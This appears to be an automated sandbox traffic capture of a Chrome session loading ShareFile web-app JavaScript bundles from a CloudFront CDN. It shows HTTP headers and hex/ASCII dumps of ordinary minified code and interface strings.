                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 28 6b 2f 74 29 3e 73 2d 78 26 26 53 28 22 6f 76 65 72 66 6c 6f 77 22 29 2c 78 2b 3d 62 28 6b 2f 74 29 2c 6b 25 3d 74 2c 79 2e 73 70 6c 69 63 65 28 6b 2b 2b 2c 30 2c 78 29 7d 72 65 74 75 72 6e 20 49 28 79 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 2c 6f 2c 69 2c 61 2c 64 2c 70 2c 67 2c 76 2c 5f 2c 79 2c 77 2c 78 2c 43 2c 49 3d 5b 5d 3b 66 6f 72 28 79 3d 28 65 3d 45 28 65 29 29 2e 6c 65 6e 67 74 68 2c 74 3d 6d 2c 6e 3d 30 2c 69 3d 66 2c 61 3d 30 3b 61 3c 79 3b 2b 2b 61 29 28 5f 3d 65 5b 61 5d 29 3c 31 32 38 26 26 49 2e 70 75 73 68 28 6b 28 5f 29 29 3b 66 6f 72 28 72 3d 6f 3d 49 2e 6c 65 6e 67 74 68 2c 6f 26 26 49 2e 70 75 73 68 28 68 29 3b 72 3c 79 3b 29 7b 66 6f 72 28 64 3d 73 2c 61 3d 30 3b 61 3c 79 3b 2b 2b 61 29 28 5f 3d
                                                                                                                                                                                                                                                                                Data Ascii: (k/t)>s-x&&S("overflow"),x+=b(k/t),k%=t,y.splice(k++,0,x)}return I(y)}function T(e){var t,n,r,o,i,a,d,p,g,v,_,y,w,x,C,I=[];for(y=(e=E(e)).length,t=m,n=0,i=f,a=0;a<y;++a)(_=e[a])<128&&I.push(k(_));for(r=o=I.length,o&&I.push(h);r<y;){for(d=s,a=0;a<y;++a)(_=
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 41 6e 6f 6e 79 6d 6f 75 73 3d 31 5d 3d 22 41 6e 6f 6e 79 6d 6f 75 73 22 2c 65 5b 65 2e 52 65 71 75 69 72 65 55 73 65 72 49 6e 66 6f 3d 32 5d 3d 22 52 65 71 75 69 72 65 55 73 65 72 49 6e 66 6f 22 2c 65 5b 65 2e 52 65 71 75 69 72 65 4c 6f 67 69 6e 45 6d 70 6c 6f 79 65 65 73 4f 6e 6c 79 3d 34 5d 3d 22 52 65 71 75 69 72 65 4c 6f 67 69 6e 45 6d 70 6c 6f 79 65 65 73 4f 6e 6c 79 22 2c 65 5b 65 2e 52 65 71 75 69 72 65 4c 6f 67 69 6e 45 6d 70 6c 6f 79 65 65 73 41 6e 64 43 6c 69 65 6e 74 73 3d 38 5d 3d 22 52 65 71 75 69 72 65 4c 6f 67 69 6e 45 6d 70 6c 6f 79 65 65 73 41 6e 64 43 6c 69 65 6e 74 73 22 2c 65 5b 65 2e 52 65 71 75 69 72 65 4c 6f 67 69 6e 3d 31 36 5d 3d 22 52 65 71 75 69 72 65 4c 6f 67 69 6e 22 7d 28 53 7c 7c 28 53 3d 7b 7d 29 29 3b 76 61 72 20 43 2c 45
                                                                                                                                                                                                                                                                                Data Ascii: Anonymous=1]="Anonymous",e[e.RequireUserInfo=2]="RequireUserInfo",e[e.RequireLoginEmployeesOnly=4]="RequireLoginEmployeesOnly",e[e.RequireLoginEmployeesAndClients=8]="RequireLoginEmployeesAndClients",e[e.RequireLogin=16]="RequireLogin"}(S||(S={}));var C,E
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC8412INData Raw: 2e 73 6c 69 63 65 28 30 2c 32 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 2f 22 7d 76 61 72 20 4a 3d 74 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 73 66 55 73 65 72 3a 7b 7d 2c 73 66 41 63 63 6f 75 6e 74 3a 7b 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 59 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 4a 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7b 73 66 55 73 65 72 3a 65 2e 75 73 65 72 2c 73 66 41 63 63 6f 75 6e 74 3a 65 2e 61 63 63 6f 75 6e 74 7d 7d 2c 65 2e 63 68 69 6c 64 72 65 6e 29 7d 76 61 72 20 58 3d 73 28 39 34 36 29 3b 66 75 6e 63 74 69 6f 6e 20 65 65 28 29 7b 72 65 74 75 72 6e 20 65 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e
                                                                                                                                                                                                                                                                                Data Ascii: .slice(0,2)).toString()+"/"}var J=t.createContext({sfUser:{},sfAccount:{}});function Y(e){return t.createElement(J.Provider,{value:{sfUser:e.user,sfAccount:e.account}},e.children)}var X=s(946);function ee(){return ee=Object.assign?Object.assign.bind():fun
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC7972INData Raw: 7a 2d 7c 2d 6d 73 2d 2f 3b 65 2e 65 78 70 6f 72 74 73 3d 74 5b 22 64 65 66 61 75 6c 74 22 5d 7d 29 29 3b 4c 65 28 47 65 29 3b 76 61 72 20 48 65 3d 4d 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 5b 22 64 65 66 61 75 6c 74 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 21 28 30 2c 72 5b 22 64 65 66 61 75 6c 74 22 5d 29 28 74 29 26 26 74 2e 69 6e 64 65 78 4f 66 28 22 63 61 6c 63 28 22 29 3e 2d 31 29 72 65 74 75 72 6e 20 6f 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 2f 63
                                                                                                                                                                                                                                                                                Data Ascii: z-|-ms-/;e.exports=t["default"]}));Le(Ge);var He=Me((function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t["default"]=function(e,t){if("string"==typeof t&&!(0,r["default"])(t)&&t.indexOf("calc(")>-1)return o.map((function(e){return t.replace(/c
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC12792INData Raw: 5b 22 64 65 66 61 75 6c 74 22 5d 7d 29 29 3b 4c 65 28 77 74 29 3b 76 61 72 20 62 74 3d 4d 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 5b 22 64 65 66 61 75 6c 74 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 2c 6c 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 29 7b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 28 30 2c 72 5b 22 64 65 66 61 75 6c 74 22 5d 29 28 65 29 29 72 65 74 75 72 6e 20 65 3b 66 6f 72 28 76 61 72 20 6f 3d 65 2e 73 70 6c 69 74 28 2f 2c 28 3f 21 5b 5e 28 29 5d 2a 28 3f 3a
                                                                                                                                                                                                                                                                                Data Ascii: ["default"]}));Le(wt);var bt=Me((function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t["default"]=function(e,t,i,l){if("string"==typeof t&&a.hasOwnProperty(e)){var c=function(e,t){if((0,r["default"])(e))return e;for(var o=e.split(/,(?![^()]*(?:


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                49192.168.2.64977513.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC593OUTGET /sharefile-web/sharefiledev-dc-pilet/1.379.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 188960
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 03 Oct 2024 13:31:57 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "329a6e4feac1ec1cb43b6a99df7c8360"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 d8eef512ab23f23f549b4cd25ac5328c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: nOSHveGaS23z1Kh0rXl3FFKscjJ63XNkaqbJr-dHrJxTNergN614iw==
                                                                                                                                                                                                                                                                                Age: 45973
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 63 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdcpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},o={},s={},l={},c={};return Obje
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 6c 75 6d 6e 53 70 61 6e 3a 31 2c 66 6f 6e 74 57 65 69 67 68 74 3a 31 2c 6c 69 6e 65 48 65 69 67 68 74 3a 31 2c 6f 70 61 63 69 74 79 3a 31 2c 6f 72 64 65 72 3a 31 2c 6f 72 70 68 61 6e 73 3a 31 2c 74 61 62 53 69 7a 65 3a 31 2c 77 69 64 6f 77 73 3a 31 2c 7a 49 6e 64 65 78 3a 31 2c 7a 6f 6f 6d 3a 31 2c 57 65 62 6b 69 74 4c 69 6e 65 43 6c 61 6d 70 3a 31 2c 66 69 6c 6c 4f 70 61 63 69 74 79 3a 31 2c 66 6c 6f 6f 64 4f 70 61 63 69 74 79 3a 31 2c 73 74 6f 70 4f 70 61 63 69 74 79 3a 31 2c 73 74 72 6f 6b 65 44 61 73 68 61 72 72 61 79 3a 31 2c 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 3a 31 2c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 3a 31 2c 73 74 72 6f 6b 65 4f 70 61 63 69 74 79 3a 31 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 31 7d 2c 61 3d 6e 28 36 32 38
                                                                                                                                                                                                                                                                                Data Ascii: lumnSpan:1,fontWeight:1,lineHeight:1,opacity:1,order:1,orphans:1,tabSize:1,widows:1,zIndex:1,zoom:1,WebkitLineClamp:1,fillOpacity:1,floodOpacity:1,stopOpacity:1,strokeDasharray:1,strokeDashoffset:1,strokeMiterlimit:1,strokeOpacity:1,strokeWidth:1},a=n(628
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2c 7b 6d 65 74 68 6f 64 3a 22 50 55 54 22 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 2c 68 65 61 64 65 72 73 3a 7b 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 7d 29 2c 6e 3d 79 69 65 6c 64 20 66 65 74 63 68 28 74 29 3b 69 66 28 32 30 30 21 3d 3d 6e 2e 73 74 61 74 75 73 29 74 68 72 6f 77 20 6e 65 77 20 6f 28 22 55 6e 61 62 6c 65 20 74 6f 20 70 75 74 20 70 72 6f 6a 65 63 74 22 2c 6e 29 3b 63 6f 6e 73 74 20 72 3d 79 69 65 6c 64 20 6e 2e 74 65 78 74 28 29 3b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 72 2c 6d 29 7d 29 29 7d 2c 64 65 6c 65 74 65 50 72 6f 6a 65 63 74 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69
                                                                                                                                                                                                                                                                                Data Ascii: ,{method:"PUT",body:JSON.stringify(e),headers:{"content-type":"application/json"}}),n=yield fetch(t);if(200!==n.status)throw new o("Unable to put project",n);const r=yield n.text();return JSON.parse(r,m)}))},deleteProject(e){return(0,r.__awaiter)(this,voi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC15239INData Raw: 2c 74 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 70 6f 70 28 29 3a 22 22 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 75 73 65 28 6e 65 77 20 6f 2e 41 28 7b 70 72 65 66 69 78 3a 22 7b 3c 22 2c 73 75 66 66 69 78 3a 22 3e 7d 22 7d 29 29 2e 69 6e 69 74 28 63 28 63 28 7b 7d 2c 64 29 2c 74 29 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 76 61 72 20 65 2c 74 2c 6e 3d 6e 75 6c 6c 21 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 69 2e 41 79 2e 6c 61 6e 67 75 61 67 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 5b 30 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 67 28 29 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b
                                                                                                                                                                                                                                                                                Data Ascii: ,t){return Array.isArray(t)?t.pop():""}};function f(e,t){return e.use(new o.A({prefix:"{<",suffix:">}"})).init(c(c({},d),t)),e}function p(){var e,t,n=null!==(e=null===(t=i.Ay.languages)||void 0===t?void 0:t[0])&&void 0!==e?e:g();return n||(console.warn("[
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC9594INData Raw: 22 2c 75 70 64 61 74 65 3a 22 55 70 64 61 74 65 22 7d 7d 2c 66 6f 72 6d 4c 61 62 65 6c 73 3a 7b 61 6c 65 72 74 46 6f 72 6d 3a 7b 61 6c 65 72 74 4c 69 6d 69 74 49 6e 66 6f 3a 22 4c 69 6d 69 74 20 66 6f 72 20 6d 61 78 69 6d 75 6d 20 61 73 73 69 67 6e 65 65 73 20 69 73 22 7d 2c 70 6c 61 63 65 68 6f 6c 64 65 72 54 65 78 74 46 6f 72 6d 3a 22 53 74 61 72 74 20 74 79 70 69 6e 67 2e 2e 2e 22 7d 2c 68 65 61 64 65 72 3a 22 44 79 6e 61 6d 69 63 20 54 61 73 6b 20 50 69 6c 65 74 22 2c 6d 61 6e 61 67 65 46 69 65 6c 64 3a 7b 61 64 64 3a 22 41 64 64 20 46 69 65 6c 64 22 2c 61 64 64 43 6f 6c 75 6d 6e 41 72 69 61 4c 61 62 65 6c 3a 22 41 64 64 20 63 6f 6c 75 6d 6e 20 62 75 74 74 6f 6e 20 2d 20 55 73 65 20 74 68 69 73 20 62 75 74 74 6f 6e 20 74 6f 20 61 64 64 20 61 20 6e 65
                                                                                                                                                                                                                                                                                Data Ascii: ",update:"Update"}},formLabels:{alertForm:{alertLimitInfo:"Limit for maximum assignees is"},placeholderTextForm:"Start typing..."},header:"Dynamic Task Pilet",manageField:{add:"Add Field",addColumnAriaLabel:"Add column button - Use this button to add a ne
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 64 22 2c 6e 6f 74 69 66 79 43 72 65 61 74 65 52 65 63 6f 72 64 53 75 63 63 65 73 73 3a 22 7b 7b 74 61 62 4e 61 6d 65 7d 7d 20 61 64 64 65 64 22 2c 6e 6f 74 69 66 79 43 72 65 61 74 65 54 61 62 6c 65 53 75 63 63 65 73 73 3a 22 54 61 62 20 61 64 64 65 64 22 2c 6e 6f 74 69 66 79 44 65 6c 65 74 65 46 69 65 6c 64 53 75 63 63 65 73 73 3a 22 46 69 65 6c 64 20 64 65 6c 65 74 65 64 22 2c 6e 6f 74 69 66 79 44 65 6c 65 74 65 52 65 63 6f 72 64 53 75 63 63 65 73 73 3a 22 7b 7b 74 61 62 4e 61 6d 65 7d 7d 20 64 65 6c 65 74 65 64 22 2c 6e 6f 74 69 66 79 44 65 6c 65 74 65 54 61 62 6c 65 53 75 63 63 65 73 73 3a 22 54 61 62 20 64 65 6c 65 74 65 64 22 2c 6e 6f 74 69 66 79 55 70 64 61 74 65 46 69 65 6c 64 53 75 63 63 65 73 73 3a 22 46 69 65 6c 64 20 61 64 64 65 64 22 2c 6e 6f
                                                                                                                                                                                                                                                                                Data Ascii: d",notifyCreateRecordSuccess:"{{tabName}} added",notifyCreateTableSuccess:"Tab added",notifyDeleteFieldSuccess:"Field deleted",notifyDeleteRecordSuccess:"{{tabName}} deleted",notifyDeleteTableSuccess:"Tab deleted",notifyUpdateFieldSuccess:"Field added",no
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC6002INData Raw: 20 53 74 72 69 6b 65 74 68 72 6f 75 67 68 22 2c 73 75 62 73 63 72 69 70 74 3a 22 46 6f 72 6d 61 74 20 53 75 62 73 63 72 69 70 74 22 2c 73 75 70 65 72 73 63 72 69 70 74 3a 22 46 6f 72 6d 61 74 20 53 75 70 65 72 73 63 72 69 70 74 22 2c 75 6e 64 65 72 6c 69 6e 65 3a 22 46 6f 72 6d 61 74 20 55 6e 64 65 72 6c 69 6e 65 22 2c 75 6e 64 6f 3a 22 55 6e 64 6f 22 7d 2c 66 6f 72 6d 61 74 3a 7b 4c 61 72 67 65 48 65 61 64 69 6e 67 3a 22 4c 61 72 67 65 20 48 65 61 64 69 6e 67 22 2c 62 75 6c 6c 65 74 4c 69 73 74 3a 22 42 75 6c 6c 65 74 20 4c 69 73 74 22 2c 63 68 65 63 6b 4c 69 73 74 3a 22 43 68 65 63 6b 65 64 20 4c 69 73 74 22 2c 63 6f 64 65 42 6c 6f 63 6b 3a 22 43 6f 64 65 20 42 6c 6f 63 6b 22 2c 6e 6f 72 6d 61 6c 3a 22 4e 6f 72 6d 61 6c 22 2c 6e 75 6d 62 65 72 4c 69 73
                                                                                                                                                                                                                                                                                Data Ascii: Strikethrough",subscript:"Format Subscript",superscript:"Format Superscript",underline:"Format Underline",undo:"Undo"},format:{LargeHeading:"Large Heading",bulletList:"Bullet List",checkList:"Checked List",codeBlock:"Code Block",normal:"Normal",numberLis
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 6c 69 6e 65 3a 22 46 6f 72 6d 61 74 20 55 6e 64 65 72 6c 69 6e 65 22 2c 75 6e 64 6f 3a 22 55 6e 64 6f 22 7d 2c 66 6f 72 6d 61 74 3a 7b 4c 61 72 67 65 48 65 61 64 69 6e 67 3a 22 4c 61 72 67 65 20 48 65 61 64 69 6e 67 22 2c 62 75 6c 6c 65 74 4c 69 73 74 3a 22 42 75 6c 6c 65 74 20 4c 69 73 74 22 2c 63 68 65 63 6b 4c 69 73 74 3a 22 43 68 65 63 6b 65 64 20 4c 69 73 74 22 2c 63 6f 64 65 42 6c 6f 63 6b 3a 22 43 6f 64 65 20 42 6c 6f 63 6b 22 2c 6e 6f 72 6d 61 6c 3a 22 4e 6f 72 6d 61 6c 22 2c 6e 75 6d 62 65 72 4c 69 73 74 3a 22 4e 75 6d 62 65 72 65 64 20 4c 69 73 74 22 2c 71 75 6f 74 65 3a 22 51 75 6f 74 65 22 2c 73 6d 61 6c 6c 48 65 61 64 69 6e 67 3a 22 53 6d 61 6c 6c 20 48 65 61 64 69 6e 67 22 7d 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 22 45 6e 74 65 72 20 73 6f
                                                                                                                                                                                                                                                                                Data Ascii: line:"Format Underline",undo:"Undo"},format:{LargeHeading:"Large Heading",bulletList:"Bullet List",checkList:"Checked List",codeBlock:"Code Block",normal:"Normal",numberList:"Numbered List",quote:"Quote",smallHeading:"Small Heading"},placeholder:"Enter so
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC2804INData Raw: 77 20 52 65 67 45 78 70 28 73 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 69 66 28 21 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 67 65 74 4b 65 79 46 6f 72 45 6c 65 6d 65 6e 74 28 29 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 65 6c 65 6d 65 6e 74 20 61 6e 64 20 74 6f 6b 65 6e 49 6e 64 65 78 22 29 3b 72 65 74 75 72 6e 20 64 2e 68 61 73 68 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 73 28 4f 62 6a 65 63 74 28
                                                                                                                                                                                                                                                                                Data Ascii: w RegExp(s)}function h(e,t){if(!e||void 0===t)throw new Error("getKeyForElement() must be provided element and tokenIndex");return d.hash(JSON.stringify(function(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?s(Object(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC12792INData Raw: 74 2b 22 29 20 69 73 20 67 72 65 61 74 65 72 20 74 68 61 6e 20 74 68 65 20 6e 75 6d 62 65 72 20 6f 66 20 64 69 72 65 63 74 6f 72 69 65 73 20 28 22 2b 61 2b 22 29 20 69 6e 20 74 68 65 20 55 52 4c 20 70 61 74 68 20 22 2b 65 29 3b 76 61 72 20 6f 3d 72 2e 73 6c 69 63 65 28 30 2c 69 2b 31 29 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 2b 6f 7d 74 2e 79 3d 72 3b 76 61 72 20 61 3d 4e 75 6d 62 65 72 2e 69 73 49 6e 74 65 67 65 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 69 73 46 69 6e 69 74 65 28 65 29 26 26 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 3d 3d 3d 65 7d 7d 2c 38 32 32 32 3a 65 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65
                                                                                                                                                                                                                                                                                Data Ascii: t+") is greater than the number of directories ("+a+") in the URL path "+e);var o=r.slice(0,i+1);return n.protocol+"//"+n.host+o}t.y=r;var a=Number.isInteger||function(e){return"number"==typeof e&&isFinite(e)&&Math.floor(e)===e}},8222:e=>{"use strict";e.e


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                50192.168.2.64977413.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC597OUTGET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.88/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC612INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 1782918
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 06:42:12 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 01 Oct 2024 10:45:21 GMT
                                                                                                                                                                                                                                                                                ETag: "e43f171e9c550011e58426af8e55dcee"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 c379418fd6100691807f32f274ebe9ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 0RmHXsgsy2M3-NJexwpzh8joHWqJFToHnHtw8LaSUe0gofgfTzEhPg==
                                                                                                                                                                                                                                                                                Age: 40982
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
